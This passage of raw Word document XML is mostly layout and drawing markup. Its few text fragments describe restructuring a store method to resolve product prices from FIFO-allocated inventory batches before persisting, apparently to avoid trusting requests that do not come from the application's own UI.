          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "what if the request did not come from our own UI?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F25B93" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="197" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24"/>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6048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62BB307C" wp14:editId="423FF211">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>65782</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-11106</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="647700" cy="352425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26043" name="Group 26043"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="647700" cy="352425"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="647700" cy="352425"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1036" name="Shape 1036"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="190500" y="0"/>
                            <a:ext cx="457200" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450305" y="0"/>
                                  <a:pt x="452550" y="930"/>
                                  <a:pt x="454410" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456270" y="4645"/>
                                  <a:pt x="457200" y="6896"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="126454"/>
                                  <a:pt x="456270" y="128693"/>
                                  <a:pt x="454410" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452550" y="132414"/>
                                  <a:pt x="450305" y="133344"/>
                                  <a:pt x="447675" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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41" name="Shape 1041"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="31432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3"/>
                                  <a:pt x="38100" y="16514"/>
                                  <a:pt x="38100" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="38100" y="21574"/>
                                  <a:pt x="37617" y="23999"/>
                                  <a:pt x="36650" y="26336"/>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6"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="483" y="23999"/>
                                  <a:pt x="0" y="21574"/>
                                  <a:pt x="0" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="16514"/>
                                  <a:pt x="483" y="14083"/>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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="59179C2E" id="Group 26043" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.2pt;margin-top:-.85pt;width:51pt;height:27.75pt;z-index:-251410432" coordsize="6477,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&#10;">
                <v:shape id="Shape 1036" o:spid="_x0000_s1027" style="position:absolute;left:1905;width:4572;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4572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j1xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTjQ0ETV1FCi3Sg1DNwdzG7DRJm50N2dWs/75bKHibx/uc1SaYTlxpcK1lBfNZAoK4&#10;srrlWkFxfJsuQDiPrLGzTApu5GCzfpisMNd25E+6HnwtYgi7HBU03ve5lK5qyKCb2Z44cl92MOgj&#10;HGqpBxxjuOnkc5Jk0mDLsaHBnl4bqn4OF6PgdO7eQ7Ysx++yLj6qfZqOZWClnh7D9gWEp+Dv4n/3&#10;Tsf5SZrB3zfxBLn+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI7f+PXEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l447675,v2630,,4875,930,6735,2784c456270,4645,457200,6896,457200,9525r,114300c457200,126454,456270,128693,454410,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,457200,133350"/>
                </v:shape>
                <v:shape id="Shape 1041" o:spid="_x0000_s1028" style="position:absolute;top:3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ahxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CFHqr2bWlldUoUij0oqDWg7dhM27ibiZLkrrrv28Khd7m8T5nsRpdJ64UovWsoJwUIIhr&#10;ry03Cr4OH08zEDEha+w8k4IbRVgt7+8WWGk/8I6u+9SIHMKxQgUmpb6SMtaGHMaJ74kzd/bBYcow&#10;NFIHHHK46+S0KF6lQ8u5wWBP74bqdv/tFGxLK9s2PK8bM91sL3bYnY5vo1KPD+N6DiLRmP7Ff+5P&#10;necXLyX8fpNPkMsfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGzERqHEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m19050,v2526,,4956,484,7290,1445c28674,2412,30734,3789,32520,5575v1787,1786,3163,3845,4130,6176c37617,14083,38100,16514,38100,19050v,2524,-483,4949,-1450,7286c35683,28662,34307,30727,32520,32513v-1786,1786,-3846,3162,-6180,4130c24006,37610,21576,38094,19050,38100v-2526,-6,-4956,-490,-7290,-1457c9426,35675,7366,34299,5580,32513,3793,30727,2417,28662,1450,26336,483,23999,,21574,,19050,,16514,483,14083,1450,11751,2417,9420,3793,7361,5580,5575,7366,3789,9426,2412,11760,1445,14094,484,16524,,19050,xe" fillcolor="#152235" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,38100,38100"/>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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>store(</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restructured into </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resolve, then persist</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFDFB0" w14:textId="33A9DDA7" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="41"/>
        <w:ind w:left="322"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7072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A365B08" wp14:editId="024F081E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1656457</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18823</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26044" name="Group 26044"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1044" name="Shape 1044"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138224"/>
                                  <a:pt x="578235" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141939"/>
                                  <a:pt x="574130" y="142869"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>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C3C6093" id="Group 26044" o:spid="_x0000_s1026" style="position:absolute;margin-left:130.45pt;margin-top:-1.5pt;width:45.75pt;height:11.25pt;z-index:-251409408" coordsize="581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&#10;">
                <v:shape id="Shape 1044" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1428;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oKaxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hhF5KzVYWsVujWEEo9OAbPE434z7cTJYk1fXfG6HQ23x8z5nMOtOICzlfWVbwNkhAEOdW&#10;V1wo2O+Wr2MQPiBrbCyTght5mE17TxPMtL3yhi7bUIgYwj5DBWUIbSalz0sy6Ae2JY7cyTqDIUJX&#10;SO3wGsNNI4dJMpIGK44NJba0KCk/b3+Ngt3m8JOuV8e6fl+/zF39uVp+s1Tqud/NP0AE6sK/+M/9&#10;peP8JE3h8U08QU7vAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALxWgprEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581025,6896,581025,9525r,123825c581025,135979,580095,138224,578235,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138224,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> price from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grn_items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> batches that FIFO actually allocates, quantity-weighted when one line spans several batches at different prices. Stock allocation therefore moves earlier in the method; it already ran inside one transaction, so atomicity is unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B251FC8" w14:textId="5318EC3F" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="86" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="11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8096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CF721F2" wp14:editId="1FDDF97D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1142107</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20319</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="866775" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26046" name="Group 26046"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="866775" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="866775" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1052" name="Shape 1052"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4645"/>
                                  <a:pt x="866775" y="6896"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135979"/>
                                  <a:pt x="865845" y="138224"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141945"/>
                                  <a:pt x="859880" y="142875"/>
                                  <a:pt x="857250" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
